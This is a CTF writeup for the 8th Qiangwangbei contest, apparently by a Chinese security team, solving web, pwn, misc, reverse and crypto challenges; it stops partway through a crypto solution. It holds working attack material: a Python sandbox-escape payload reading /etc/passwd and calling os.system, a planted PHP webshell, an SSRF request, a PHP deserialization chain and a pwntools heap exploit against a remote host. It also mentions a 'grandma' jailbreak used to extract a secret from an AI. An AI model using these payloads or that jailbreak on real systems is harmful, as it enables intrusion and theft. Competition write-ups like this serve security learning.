我们新点击蓝字
关注我们
声明
本文作者:CTF战队
本文字数:47064字
阅读时长:约60分钟
附件/链接:点击查看原文下载
本文属于【狼组安全社区】原创奖励计划,未经许可禁止转载
由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,狼组安全团队以及文章作者不为此承担任何责任。
狼组安全团队有对此文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经狼组安全团队允许,不得任意修改或者增减此文章内容,不得以任何方式将其用于商业目的。
团队每周会报名参加各类CTF比赛,writeup在公众号更新。
我们建立了一个关于CTF的公开交流群,大家赛后可以交流技巧思路。
❝第八届强网杯全国网络安全挑战赛
https://www.qiangwangbei.com
WEB
积木编程
❝https://pan.baidu.com/s/1YoJN0_he15aY2A-IYLgn1A 提取码(GAME)
from flask import Flask, request, jsonify
import re
import unidecode
import string
import ast
import sys
import os
import subprocess
import importlib.util
import json
app = Flask(__name__)
app.config['JSON_AS_ASCII'] = False
blacklist_pattern = r"[!\"#$%&'()*+,-./:;<=>?@[\\\]^_`{|}~]"
def module_exists(module_name):
spec = importlib.util.find_spec(module_name)
if spec is None:
return False
if module_name in sys.builtin_module_names:
return True
if spec.origin:
std_lib_path = os.path.dirname(os.__file__)
if spec.origin.startswith(std_lib_path) and not spec.origin.startswith(os.getcwd()):
return True
return False
def verify_secure(m):
for node in ast.walk(m):
match type(node):
case ast.Import:
print("ERROR: Banned module ")
return False
case ast.ImportFrom:
print(f"ERROR: Banned module {node.module}")
return False
return True
def check_for_blacklisted_symbols(input_text):
if re.search(blacklist_pattern, input_text):
return True
else:
return False
def block_to_python(block):
block_type = block['type']
code = ''
if block_type == 'print':
text_block = block['inputs']['TEXT']['block']
text = block_to_python(text_block)
code = f"print({text})"
elif block_type == 'math_number':
if str(block['fields']['NUM']).isdigit():
code = int(block['fields']['NUM'])
else:
code = ''
elif block_type == 'text':
if check_for_blacklisted_symbols(block['fields']['TEXT']):
code = ''
else:
code = "'" + unidecode.unidecode(block['fields']['TEXT']) + "'"
elif block_type == 'max':
a_block = block['inputs']['A']['block']
b_block = block['inputs']['B']['block']
a = block_to_python(a_block)
b = block_to_python(b_block)
code = f"max({a}, {b})"
elif block_type == 'min':
a_block = block['inputs']['A']['block']
b_block = block['inputs']['B']['block']
a = block_to_python(a_block)
b = block_to_python(b_block)
code = f"min({a}, {b})"
if 'next' in block:
block = block['next']['block']
code +="\n" + block_to_python(block)+ "\n"
else:
return code
return code
def json_to_python(blockly_data):
block = blockly_data['blocks']['blocks'][0]
python_code = ""
python_code += block_to_python(block) + "\n"
return python_code
def do(source_code):
hook_code = '''
def my_audit_hook(event_name, arg):
blacklist = ["popen", "input", "eval", "exec", "compile", "memoryview"]
if len(event_name) > 4:
raise RuntimeError("Too Long!")
for bad in blacklist:
if bad in event_name:
raise RuntimeError("No!")
__import__('sys').addaudithook(my_audit_hook)
'''
print(source_code)
code = hook_code + source_code
tree = compile(source_code, "run.py", 'exec', flags=ast.PyCF_ONLY_AST)
try:
if verify_secure(tree):
with open("run.py", 'w') as f:
f.write(code)
result = subprocess.run(['python', 'run.py'], stdout=subprocess.PIPE, timeout=5).stdout.decode("utf-8")
os.remove('run.py')
return result
else:
return "Execution aborted due to security concerns."
except:
os.remove('run.py')
return "Timeout!"
@app.route('/')
def index():
return app.send_static_file('index.html')
@app.route('/blockly_json', methods=['POST'])
def blockly_json():
blockly_data = request.get_data()
print(type(blockly_data))
blockly_data = json.loads(blockly_data.decode('utf-8'))
print(blockly_data)
try:
python_code = json_to_python(blockly_data)
return do(python_code)
except Exception as e:
return jsonify({"error": "Error generating Python code", "details": str(e)})
if __name__ == '__main__':
app.run(host = '0.0.0.0')
全角字符可绕过
{
"blocks": {
"blocks": [
{
"type": "print",
"id": "print1",
"inputs": {
"TEXT": {
"block": {
"type": "text",
"id": "text1",
"fields": {
"TEXT": "s"')\nprint(open("/etc/passwd", "r").read())\n#"
}
}
}
}
}
]
}
}
这里只能读取文件,没有读取/flag的权限\n
hook 函数中,对event_name 长度进行了限制
def my_audit_hook(event_name, arg):
# print(f"[+]{event_name},{arg}")
blacklist = ["popen", "input", "eval", "exec", "compile", "memoryview"]
if len(event_name) > 4:
raise RuntimeError("Too Long!")
for bad in blacklist:
if bad in event_name:
raise RuntimeError("No!")
可以看到,这里使用了len函数判断长度是否大于4。我们可以通过重写len函数,让它稳定返回3,就可以绕过第一层长度的过滤
__builtins__.len = lambda x: 3\nprint(len('aaaaa'))
可以看到len函数返回3
随后,我们使用类似于SSTI的payload获取os.system
[ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if x.__name__=="_wrap_close"][0]["system"]("ls")
可以在绕过了event name长度限制后拿到os.system
将二者拼在一起转化成全角字符使用即可执行命令,接下来开始提权读取文件
payload:
{
"blocks": {
"blocks": [
{
"type": "print",
"id": "print1",
"inputs": {
"TEXT": {
"block": {
"type": "text",
"id": "text1",
"fields": {
"TEXT": "s"')\n__builtins__.len = lambda x: 3\n[ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if x.__name__=="_wrap_close"][0]["system"]("命令")\n#"
}
}
}
}
}
]
}
}
探测SUID文件
find / -perm -u=s -type f 2>/dev/null
发现 dd 命令具有 root 执行权限
可以通过 dd 读取 /flag 文件内容
xiaohuanxiong
题目部分admin 路由未经鉴权可直接访问
/admin/payment.html 处可以修改网站配置,写入一句话木马,使用蚁剑连接
连接后可以在根目录发现 flag 文件
snake
❝做题太无聊,来玩贪吃蛇~
使用脚本可以跑出来分数(欣赏图形化贪吃蛇 多跑几次就会弹出来win)
import http.client
import json
import random
import time
import pygame
# 服务器地址和端口
host = 'eci-2zedfkwha8kfivrlh22r.cloudeci1.ichunqiu.com'
port = 5000
# 定义四个可能的方向及其对应的坐标变化
DIRECTIONS = {
'UP': (0, -1),
'DOWN': (0, 1),
'LEFT': (-1, 0),
'RIGHT': (1, 0)
}
# 初始化Pygame
pygame.init()
# 设置窗口大小
window_size = 400
cell_size = 20
screen = pygame.display.set_mode((window_size, window_size))
pygame.display.set_caption('Snake Game')
# 定义颜色
WHITE = (255, 255, 255)
BLACK = (0, 0, 0)
GREEN = (0, 255, 0)
RED = (255, 0, 0)
def draw_snake(snake):
for segment in snake:
x, y = segment
pygame.draw.rect(screen, GREEN, (x * cell_size, y * cell_size, cell_size, cell_size))
def draw_food(food):
x, y = food
pygame.draw.rect(screen, RED, (x * cell_size, y * cell_size, cell_size, cell_size))
def send_move(direction):
# 创建连接
conn = http.client.HTTPConnection(host, port)
# 准备请求体
payload = json.dumps({"direction": direction})
# 设置请求头
headers = {
'Content-Type': 'application/json',
'Accept-Language': 'zh-CN,zh;q=0.9',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.6613.120 Safari/537.36',
'Accept': '*/*',
'Origin': f'http://{host}:{port}',
'Referer': f'http://{host}:{port}/',
'Accept-Encoding': 'gzip, deflate, br',
'Cookie': 'session=eyJ1c2VybmFtZSI6InRlc3QifQ.ZyYZAQ.a_hBKR3T7JORnNazAei6qatDLQ4',
'Connection': 'keep-alive'
}
# 发送POST请求
conn.request("POST", "/move", body=payload, headers=headers)
# 获取响应
response = conn.getresponse()
data = response.read().decode('utf-8')
# 关闭连接
conn.close()
return json.loads(data)
def choose_direction(snake, food, board_size=20):
head_x, head_y = snake[0]
food_x, food_y = food
# 计算每个方向的得分
scores = {}
for direction, (dx, dy) in DIRECTIONS.items():
new_x = head_x + dx
new_y = head_y + dy
# 检查是否会撞墙
if not (0 <= new_x < board_size and 0 <= new_y < board_size):
continue
# 检查是否会撞到自己
if [new_x, new_y] in snake:
continue
# 计算与食物的距离
distance = abs(new_x - food_x) + abs(new_y - food_y)
scores[direction] = distance
# 选择距离食物最近的安全方向
if scores:
best_direction = min(scores, key=scores.get)
return best_direction
else:
# 如果没有安全的方向靠近食物,随机选择一个安全的方向
possible_moves = list(DIRECTIONS.keys())
for direction, (dx, dy) in DIRECTIONS.items():
new_x = head_x + dx
new_y = head_y + dy
if not (0 <= new_x < board_size and 0 <= new_y < board_size) or [new_x, new_y] in snake:
possible_moves.remove(direction)
if possible_moves:
return random.choice(possible_moves)
else:
return None
def main():
# 初始方向
direction = 'RIGHT'
while True:
# 发送移动请求
response = send_move(direction)
# 打印返回的原始JSON内容
print(response)
# 检查游戏状态
if response['status'] != 'ok':
print("Game Over")
continue
# 更新蛇的位置和食物位置
snake = response['snake']
food = response['food']
# 绘制游戏界面
screen.fill(BLACK)
draw_snake(snake)
draw_food(food)
pygame.display.flip()
# 选择下一个方向
direction = choose_direction(snake, food)
# if direction is None:
# print("No safe moves left, Game Over")
# break
# 处理事件
for event in pygame.event.get():
if event.type == pygame.QUIT:
pygame.quit()
return
# 这里可以添加延时以减慢游戏速度,便于观察
# time.sleep(0.5)
if __name__ == "__main__":
main()
pygame.quit()
跳转 /snake_win?username=test
http://eci-2zedfkwha8kfivrlh22r.cloudeci1.ichunqiu.com:5000/snake_win?username=1%27union%20select%209999,999,990009--+
有注入,但是改成绩没有用,数据库中没有flag,sqlite
最后肝到半夜发现是居然是SSTI!
platform
❝任何人都能登录的平台
输入任何内容都可以登录,php的,输入的用户名会显示在页面上
源码 www.zip
通过替换字符进行逃逸控制反序列化的内容来执行命令
proxy
❝Proxy what you want
附件下载 提取码(GAME)备用下载
package main
import (
"bytes"
"io"
"net/http"
"os/exec"
"github.com/gin-gonic/gin"
)
type ProxyRequest struct {
URL string `json:"url" binding:"required"`
Method string `json:"method" binding:"required"`
Body string `json:"body"`
Headers map[string]string `json:"headers"`
FollowRedirects bool `json:"follow_redirects"`
}
func main() {
r := gin.Default()
v1 := r.Group("/v1")
{
v1.POST("/api/flag", func(c *gin.Context) {
cmd := exec.Command("/readflag")
flag, err := cmd.CombinedOutput()
if err != nil {
c.JSON(http.StatusInternalServerError, gin.H{"status": "error", "message": "Internal Server Error"})
return
}
c.JSON(http.StatusOK, gin.H{"flag": flag})
})
}
v2 := r.Group("/v2")
{
v2.POST("/api/proxy", func(c *gin.Context) {
var proxyRequest ProxyRequest
if err := c.ShouldBindJSON(&proxyRequest); err != nil {
c.JSON(http.StatusBadRequest, gin.H{"status": "error", "message": "Invalid request"})
return
}
client := &http.Client{
CheckRedirect: func(req *http.Request, via []*http.Request) error {
if !req.URL.IsAbs() {
return http.ErrUseLastResponse
}
if !proxyRequest.FollowRedirects {
return http.ErrUseLastResponse
}
return nil
},
}
req, err := http.NewRequest(proxyRequest.Method, proxyRequest.URL, bytes.NewReader([]byte(proxyRequest.Body)))
if err != nil {
c.JSON(http.StatusInternalServerError, gin.H{"status": "error", "message": "Internal Server Error"})
return
}
for key, value := range proxyRequest.Headers {
req.Header.Set(key, value)
}
resp, err := client.Do(req)
if err != nil {
c.JSON(http.StatusInternalServerError, gin.H{"status": "error", "message": "Internal Server Error"})
return
}
defer resp.Body.Close()
body, err := io.ReadAll(resp.Body)
if err != nil {
c.JSON(http.StatusInternalServerError, gin.H{"status": "error", "message": "Internal Server Error"})
return
}
c.Status(resp.StatusCode)
for key, value := range resp.Header {
c.Header(key, value[0])
}
c.Writer.Write(body)
c.Abort()
})
}
r.Run("127.0.0.1:8769")
}
发现v1接口无法直接访问,可以用v2proxy做个代理,构造个json请求包
POST /v2/api/proxy HTTP/1.1
Host: 123.56.219.14:28704
Cache-Control: max-age=0
Accept-Language: zh-CN,zh;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.6613.120 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Content-Type: application/json
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Content-Length: 104
{
"url": "http://127.0.0.1:8769/v1/api/flag",
"method": "POST",
"follow_redirects": true
}
base64解密即可
Password Game
四个限制,要有数字字母,数字和要为一个数的倍数,一个算式结果要出现在字符串中,长度小于一个数,然后就可以得到部分代码,其中包含各种类和主逻辑
function filter($password){
$filter_arr = array("admin","2024qwb");
$filter = '/'.implode("|",$filter_arr).'/i';
return preg_replace($filter,"nonono",$password);
}
class guest{
public $username;
public $value;
public function __tostring(){
if($this->username=="guest"){
$value();
}
return $this->username;
}
public function __call($key,$value){
if($this->username==md5($GLOBALS["flag"])){
echo $GLOBALS["flag"];
}
}
}
class root{
public $username;
public $value;
public function __get($key){
if(strpos($this->username, "admin") == 0 && $this->value == "2024qwb"){
$this->value = $GLOBALS["flag"];
echo md5("hello:".$this->value);
}
}
}
class user{
public $username;
public $password;
public $value;
public function __invoke(){
$this->username=md5($GLOBALS["flag"]);
return $this->password->guess();
}
public function __destruct(){
if(strpos($this->username, "admin") == 0 ){
echo "hello".$this->username;
}
}
}
$user=unserialize(filter($_POST["password"]));
if(strpos($user->username, "admin") == 0 && $user->password == "2024qwb"){
echo "hello!";
}
显然要找一条链子触发反序列化,刚开始定向思维的想user::destruct=>guest::toString=>user::__invoke接着往下走,但是toString里是$value而不是$this->value,这玩意就变成不可控了。
可以看到除了反序列化外,下面还有字符串比较的操作,里面对反序列化出来的$user取username和password变量,可以看到root类中是没有password的,且存在__get方法,那么就可以从这里做开头,从root::get开始去修改$this->value为flag,然后通过引用设置user→username为root→value,接着触发user::destruct输出flag
<?php
function sum($a){
$su = 0;
for($i=0; $i < strlen($a); $i++){
if(is_numeric($a[$i])){
$su += $a[$i];
}
}
return $su;
}
function filter($password){
$filter_arr = array("admin","2024qwb");
$filter = '/'.implode("|",$filter_arr).'/i';
return preg_replace($filter,"nonono",$password);
}
class guest{
public $username;
public $value;
}
class root{
public $username;
public $value;
public $kk;
}
class user{
public $username;
public $password;
public $value;
}
$x = new root();
$x->username = "akaka";
$x->value = 2024;
$x->kk = new user();
$x->kk->username = &$x->value;
$x->kk->value = "6007675";
echo (26 * 4)."\n";
echo (60101 - 25)."\n";
$ser = serialize($x);
echo $ser."\n";
echo sum($ser)."\n";
echo strlen($ser)."\n";
Pwn
baby_heap
[*] '/local/ctf/qwbs8/baby_heap/pwn'
Arch: amd64-64-little
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
SHSTK: Enabled
IBT: Enabled
沙箱,这没禁用 execveat,可以用这个打哈
line CODE JT JF K
=================================
0000: 0x20 0x00 0x00 0x00000004 A = arch
0001: 0x15 0x00 0x07 0xc000003e if (A != ARCH_X86_64) goto 0009
0002: 0x20 0x00 0x00 0x00000000 A = sys_number
0003: 0x35 0x00 0x01 0x40000000 if (A < 0x40000000) goto 0005
0004: 0x15 0x00 0x04 0xffffffff if (A != 0xffffffff) goto 0009
0005: 0x15 0x03 0x00 0x00000002 if (A == open) goto 0009
0006: 0x15 0x02 0x00 0x0000003b if (A == execve) goto 0009
0007: 0x15 0x01 0x00 0x00000101 if (A == openat) goto 0009
0008: 0x06 0x00 0x00 0x7fff0000 return ALLOW
0009: 0x06 0x00 0x00 0x00000000 return KILL
GLIBC 2.35 先整个环境
GNU C Library (Ubuntu GLIBC 2.35-0ubuntu3.7) stable release version 2.35.
下个 docker 先
docker pull roderickchan/debug_pwn_env:22.04-2.35-0ubuntu3.7-20240421
add 功能:堆块要大于 0x500,基本是 largebin 或者 mmap delete 功能:没有 check,可以多次 free 同一块地址 edit 功能:只能用一次,下标在范围内就能修改,不检查是否释放 show 功能:只能用一次 有两个隐藏功能,一个对env操作,一个可以在任意地址写16个字节,都只能使用一次;该隐藏功能有限制,只能写 libc 段和后面的段,且在 libc 段中,只能写 _IO_2_1_stdin 之前的地址
应该是非预期了,找了个 got 表链子,直接泄漏环境变量
putenv 能触发如下链子
__strncmp_avx2(const char *__s1, const char *__s2, size_t __n) __s1:等于 **environ __s2:等于 putenv 所操作的环境变量名称,不包括等号和内容 __n:等于 putenv 所操作的环境变量名称长度
将其直接改为 printf 泄漏环境变量,一般动态 flag 都依靠环境变量生成,这里直接获取环境变量即可
exp 如下
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from pwn import *
import argparse
parser = argparse.ArgumentParser()
parser.add_argument("-m", "--mode", required=True, choices=["d", "debug", "r", "remote"])
args = parser.parse_args()
context(arch="amd64", endian='el', os="linux", terminal=["tmux", "splitw", "-h"])
context.log_level = "debug"
if args.mode in ["d", "debug"]:
p = process('./pwn')
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6', checksec=False)
else:
p = remote('39.106.54.211', 30821)
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6', checksec=False)
chall = ELF('./pwn', checksec=False)
def add(_size):
p.sendlineafter(b'Enter your choice: ', b'1')
p.sendlineafter(b'Enter your commodity size \n', str(_size).encode())
def delete(_idx):
p.sendlineafter(b'Enter your choice: ', b'2')
p.sendlineafter(b'Enter which to delete: \n', str(_idx).encode())
def edit(_idx, _ctx):
p.sendlineafter(b'Enter your choice: ', b'3')
p.sendlineafter(b'Enter which to edit: \n', str(_idx).encode())
p.sendlineafter(b'Input the content \n', str(_ctx).encode())
def show(_idx):
p.sendlineafter(b'Enter your choice: ', b'4')
p.sendlineafter(b'Enter which to show: \n', str(_idx).encode())
p.recvuntil(b'The content is here \n')
return p.recvuntil(b'Menu:\n')[:-6]
def secret():
p.sendlineafter(b'Enter your choice: ', b'5')
p.sendlineafter(b'Maybe you will be sad !\n', b'2')
def oooo(_addr, _ctx):
p.sendlineafter(b'Enter your choice: ', b'10')
p.sendafter(b'Input your target addr \n', _addr)
p.send(_ctx)
add(0x628)
add(0x618)
add(0x638)
add(0x618)
# gdb.attach(p, 'brva 0x1D23\nb getenv\nb setenv\nb putenv\nc')
delete(1)
libc.address = u64(show(1)[:8]) + 0x9c0 - libc.sym['_IO_2_1_stderr_']
success("libc.address = " + hex(libc.address))
libc_got_strlen = libc.address + 0x21a118
libc_setcontext = libc.address + 0x539e0
oooo(p64(libc_got_strlen), p64(libc.sym["printf"]))
secret()
p.interactive()
❝flag{648fed8f-4c88-4f72-a855-ad444999afbc}
Misc
givemesecret
❝Can you extract the flag from the AI? 请访问 http://ip:port
奶奶哄睡战术~
Master of OSINT
❝本题以百度地图选取的经纬度为准。
这是一个街景挑战,你需要找到提供的街景图片拍摄所在的具体位置。然后在题目页面点击 send 按钮,弹出对话框并输入该位置的经纬度,格式为 longitude,latitude。
当精度达到要求时,即认为你找到了这个地点。总共有 10 个地点,找到其中 9 个即可通过本题。
提交的经纬度应符合 ^-?(\d1,2})?,-?(\d|[1-8]\d|90)(.\d{1,6})?$ 。例如,如果地点为「东方明珠广播电视塔」,那么你可以提交 121.506379,31.245414。
特别注明:请不要攻击本题目的平台,这是违反规则的。
图片中有个风车,附近应该有个风力发电站,搜索风车后,找到一个相似的,是上海崇明长兴风力发电
https://m.weibo.cn/status/DCujLoGq9?from=page_1005055335640503_profile&wvr=6&mod=weibotime&jumpfrom=weibocom
然后在百度地图上找到与之相同的地点
图中的两种路灯+栅栏,可以初步认为这是在江浙。然后通过谷歌识图找到报恩寺塔,最终在百度全景地图锁定内环南线
118.782063,32.013663
首先判断拍摄所处位置应该是在立交或者高速上,再通过上方的那个栅栏,可初步猜测是在杭州。同时因为其宽度并不宽,且看不到收尾,那么上边的不是立交,只可能是铁路或者轻轨,再加上上方路段两旁的应该是高压线,从宽度和接触网来看感觉不似高铁,更像是轻轨线路。下方有许多空调外机,应该是横跨建筑群。右边有个IKEA(宜家)。那就在百度地图上找高铁和立交交错,且附近有宜家的地方,最终锁定杭州绕城高速和9号线交错的地方
120.293219,30.34633
长沙橘子洲大桥
112.967691,28.201726
左边有个宏泰百货,右边高架立柱能看清一个三局,正中间高架上写着"中铁三局集团携手促进浙江经济发展",由于高架上均有高压接触网,那么可以猜测这里至少有三条铁路线交错,很有可能附近还有个高铁站。从浙江铁路网入手,最终锁定杭州南站附近的南秀路
观察图片,图中应该是有水,猜测是湖,且湖和红色屋顶房子在同一边,道路两边分别有黄色和红色的标识物。然后谷歌识图搜到青海湖,通过百度地图在倒湖茶公路上找到那个红色屋顶的小房子。
搜索桥梁图片,应该找到一个很像的,然后点进原文http://mt.sohu.com/20171228/n526620921.shtml,但原文中出现的大桥均不是图片中的,然后逐一查看武汉的长江大桥,发现了天兴洲长江大桥和图片中一模一样。
114.413085,30.659759
图中有个百安居,且旁边应该是一个购物商场之类的,同时观察路灯,猜测这是在上海,最后在龙阳路找到了
右边远处是一个机场的塔台,岔路口对面应该是一个中国航油的加油站,但是是白色的顶?在民航局查询运输机场,然后发现是成都双流国际机场旁边机场东三路。图中的加油站应该是没修好,百度地图上有这个建筑物,但没有显示名称。
百度搜图搜出来一张很像图片,是重庆谢家湾立交
图片原文链接http://mt.sohu.com/20161016/n470410292.shtml
106.524402,29.526177
一 99.974383,36.66725
二 121.567039,31.211279
三 103.966657,30.571185
四 120.293197,30.346334
五 106.524114,29.52509
六 118.783635,32.013335
七 112.969521,28.201853
八 121.734859,31.412815
九 114.412567,30.661017
十 120.308631,30.152785
谍影重重5
题目内容:
我国某部门已经连续三年对间谍张纪星进行秘密监控,最近其网络流量突然出现大量的神秘数据,为防止其向境外传送我国机密数据,我们已将其流量保存,请你协助我们分析其传输的秘密信息。
附件下载 提取码(GAME)备用下载
根据这个文章爆破密码
https://www.secpulse.com/archives/106276.html\n
解密smb流
导出所有对象 两个证书 一个flag.7z
找到如下文章
https://bbs.kanxue.com/thread-255173.htm
用密码mimikatz导出密钥
解开rdp协议\n
参考链接
https://res260.medium.com/ihack-2020-monster-inc-the-middle-rdp-network-forensics-writeup-91e2fb0f4287
重放获得密码解密flag.7z babygirl2339347013182
Reverse
mips
虚拟机逆向,下载下来qemu跑 有假opcode 出假flag
flag{reverse_dynamic}
真flag实际上藏在/emu的加密逻辑里。我i们可以看到大概有两段加密逻辑
一段RC4,一段抑或与位移的混合加密。分别在地址0x3DE7A9和0x33D8E0
在0x33D8E0藏着一段RC4的加密
手动去除花指令
花指令去除后得到
可以看到是魔改的RC4。这里拿到S盒和KEY以后接着往后看。
从0x3DE801可以看到有一段"flag{"头的格式校验
xref 往回看,去除花指令后这里实际上藏着两段加密
可以看到,此处是一个抑或加密加一次位移
位移加密显而易见,可以直接看到逻辑是将data中的7和11互换,12和16互换。(func_swap)
抑或这里不是很好看,但是因为是单数字抑或所以可以爆破
编写解密脚本,解出(RC4解密直接找GPT写)
# 定义RC4加密函数
def rc4_decode(data, key):
# 初始化S数组
S = list(range(256))
j = 0
# 混淆S数组
for i in range(256):
j = (j + S[i] + key[i % len(key)]) % 256
S[i], S[j] = S[j], S[i]
i = j = 0
out = []
for t in range(len(data)):
i = (i + 1) % 256
j = (j + S[i]) % 256
S[i], S[j] = S[j], S[i]
# 应用RC4加密
data[t] ^= S[(S[i] + S[j]) % 256]^ keyb[t & 3] # 这里小小魔改了
# 应用额外的位操作来混淆数据
data[t] = (((data[t] << 5) | (data[t] >> 3)) ^ 0xDE) & 0xFF
data[t] = (((data[t] << 4) | (data[t] >> 4)) ^ 0xAD) & 0xFF
data[t] = (((data[t] << 3) | (data[t] >> 5)) ^ 0xBE) & 0xFF
data[t] = ((((data[t] ^ 0x3B) << 2) | ((data[t] ^ 0xC0) >> 6))) & 0xFF
data[t] = ((data[t] << 1) | (data[t] >> 7)) & 0xFF
out.append(data[t])
return out
# 数据和密钥
data = [0xC4, 0xEE, 0x3C, 0xBB, 0xE7, 0xFD, 0x67, 0x1D, 0xF8, 0x97, 0x68, 0x9D, 0xB, 0x7F, 0xC7, 0x80, 0xDF, 0xF9, 0x4B, 0xA0, 0x46, 0x91]
keyb = [0xDE, 0xAD, 0xBE, 0xEF]
key = '6105t3'.encode() # 将字符串密钥转换为字节
# 交换data数组中的某些元素
data[12], data[16] = data[16], data[12]
data[7], data[11] = data[11], data[7]
# 执行RC4加密
dec = rc4_decode(data, key)
# 爆破异或值
for i in range(1, 100):
a = ''.join([chr(x ^ i) for x in dec ])
if a.isascii() and '}' in a:
print(a)
输出
QeMu_r3v3rs3in9_h@ck6}
^jBzP}<y<}|<fa6PgOld9r
_kC{Q|=x=|}=g`7QfNme8s
YmE}Wz;~;z{;af1W`Hkc>u
ZnF~Ty8}8yx8be2TcKh`=v
DpX`Jg&c&gf&|{,J}Uv~#h
EqYaKf'b'fg'}z-K|Tw"i
Gs[cId%`%de%x/I~Vu} k
Bv^fLa e a` z}*L{Spx%n
O{SkAl-h-lm-wp'Av^}u(c
I}UmGj+n+jk+qv!GpX{s.e
sGoW}PTPQKLJbAI_
}IaYs^Z^_EBsDlOGQ
aU}EoBFBCY^ oXpS[M
lXpHbOKONTSbU}^V
@
! 1w2w67w-*}9
+;<}8}<=}' w&-%x3
.>9x=x98x"%r#
( }6
显然第一个是flag(没有flag头)
flag{QeMu_r3v3rs3in9_h@ck6}
Crypto
EasyRSA
❝easy的RSA。
https://pan.baidu.com/s/1oqmNif9L3zaGgJMNvrlckQ 提取码(GAME)
#encoding:utf-8
from Crypto.Util.number import long_to_bytes, bytes_to_long, getPrime
import random, gmpy2
class RSAEncryptor:
def __init__(self):
self.g = self.a = self.b = 0
self.e = 65537
self.factorGen()
self.product()
def factorGen(self):
while True:
self.g = getPrime(500)
while not gmpy2.is_prime(2*self.g*self.a+1):
self.a = random.randint(2**523, 2**524)
while not gmpy2.is_prime(2*self.g*self.b+1):
self.b = random.randint(2**523, 2**524)
self.h = 2*self.g*self.a*self.b+self.a+self.b
if gmpy2.is_prime(self.h):
self.N = 2*self.h*self.g+1
print(len(bin(self.N)))
return
def encrypt(self, msg):
return gmpy2.powmod(msg, self.e, self.N)
def product(self):
with open('/flag', 'rb') as f:
self.flag = f.read()
self.enc = self.encrypt(self.flag)
self.show()
print(f'enc={self.enc}')
def show(self):
print(f"N={self.N}")
print(f"e={self.e}")
print(f"g={self.g}")
RSAEncryptor()
参考https://hasegawaazusa.github.io/common-prime-rsa.html#%E7%94%9F%E6%88%90%E7%AE%97%E6%B3%95
from Crypto.Util.number import long_to_bytes, bytes_to_long, getPrime
import random, gmpy2
N=68181737436076529224562801475664297421729354212384041118703553655862954054390604345710204499672389859306230171439336751620692051642891341227511379742159778551509301729325926212030040953445232196672875614781992761633486842422763277359149614042100859799287161072975734377155654677838861451658435279911613496030174632772094600976623289395051692814762337022334904693262714503157142625354019950324235481018728283797128366923672374929302811892040002045357581088454106853192632046865605032932353925106145687276613086609216472031735150281366585771571092053452303427609476066826071699082450442010727647542422591413685012991847
e=65537
g=2727446902919970141730604198759853937077025270972540761838813887361413426265374291573543190662905624555591260123009922278536283328614119860275108794191
enc=22861546506055135213358174312554646492187230381898758188877170608117485697823358493902656822896995774774583447870634616151878506893600307136194448466391765676766649364517016807954203559422855990414639527101844069106007405310915954983002225014275471201621305566277481389231026040692035284000924899379960675354638203176299281188958081732877418895852360509500030058881789441137950812074377976972980617402981583206439462939115804475740461147572369766349241970070299606353350638491580474229665228427437979284493336214816411172283734295612780839157029963764634374109413111316530398201103686311906828987763255882793136411901
nbits = 2048
gamma = 0.244
cbits = ceil(nbits * (0.5 - 2 * gamma))
M = (N - 1) // (2 * g)
u = M // (2 * g)
v = M - 2 * g * u
GF = Zmod(N)
x = GF.random_element()
y = x ^ (2 * g)
# c的范围大概与N^(0.5-2*gamma)很接近
c = bsgs(y, y ^ u, (Integer(2**(cbits-1)), Integer(2**(cbits+1))))
ab = u - c
apb = v + 2 * g * c
P.<x> = ZZ[]
f = x ^ 2 - apb * x + ab
a = f.roots()
if a:
a, b = a[0][0], a[1][0]
p = 2 * g * a + 1
q = 2 * g * b + 1
assert p * q == N
d=gmpy2.invert(65537,(p-1)*(q-1))
m=pow(enc,d,N)
print(long_to_bytes(m))
#flag{819fbbea-be48-405b-8d63-d2e1ed26ddcb}
apbq
第一部分给了p+q,直接解方程组解pq,然后解rsa即可
from Crypto.Util.number import *
hints = 18978581186415161964839647137704633944599150543420658500585655372831779670338724440572792208984183863860898382564328183868786589851370156024615630835636170
public_key = (89839084450618055007900277736741312641844770591346432583302975236097465068572445589385798822593889266430563039645335037061240101688433078717811590377686465973797658355984717210228739793741484666628342039127345855467748247485016133560729063901396973783754780048949709195334690395217112330585431653872523325589, 65537)
enc1 = 23664702267463524872340419776983638860234156620934868573173546937679196743146691156369928738109129704387312263842088573122121751421709842579634121187349747424486233111885687289480494785285701709040663052248336541918235910988178207506008430080621354232140617853327942136965075461701008744432418773880574136247
# var("p q")
# solve([p+q==hints,p*q==public_key[0]],[p,q])
p=9944868810114216202051445555036732697046288141145767567362511367574668195172230525918426361043964814581009916352403620781997665604176512356634685730213779
q=9033712376300945762788201582667901247552862402274890933223144005257111475166493914654365847940219049279888466211924563086788924247193643667980945105422391
d=gmpy2.invert(65537,(p-1)*(q-1))
m=pow(enc1,d,public_key[0])
print(long_to_bytes(m))
#flag{yOu_can_
第二部分参考这个题:https://github.com/josephsurin/my-ctf-challenges/tree/main/downunderctf-2023/apbq-rsa-ii
from Crypto.Util.number import *
import gmpy2
import itertools
hints = [18167664006612887319059224902765270796893002676833140278828762753019422055112981842474960489363321381703961075777458001649580900014422118323835566872616431879801196022002065870575408411392402196289546586784096, 16949724497872153018185454805056817009306460834363366674503445555601166063612534131218872220623085757598803471712484993846679917940676468400619280027766392891909311628455506176580754986432394780968152799110962, 17047826385266266053284093678595321710571075374778544212380847321745757838236659172906205102740667602435787521984776486971187349204170431714654733175622835939702945991530565925393793706654282009524471957119991, 25276634064427324410040718861523090738559926416024529567298785602258493027431468948039474136925591721164931318119534505838854361600391921633689344957912535216611716210525197658061038020595741600369400188538567, 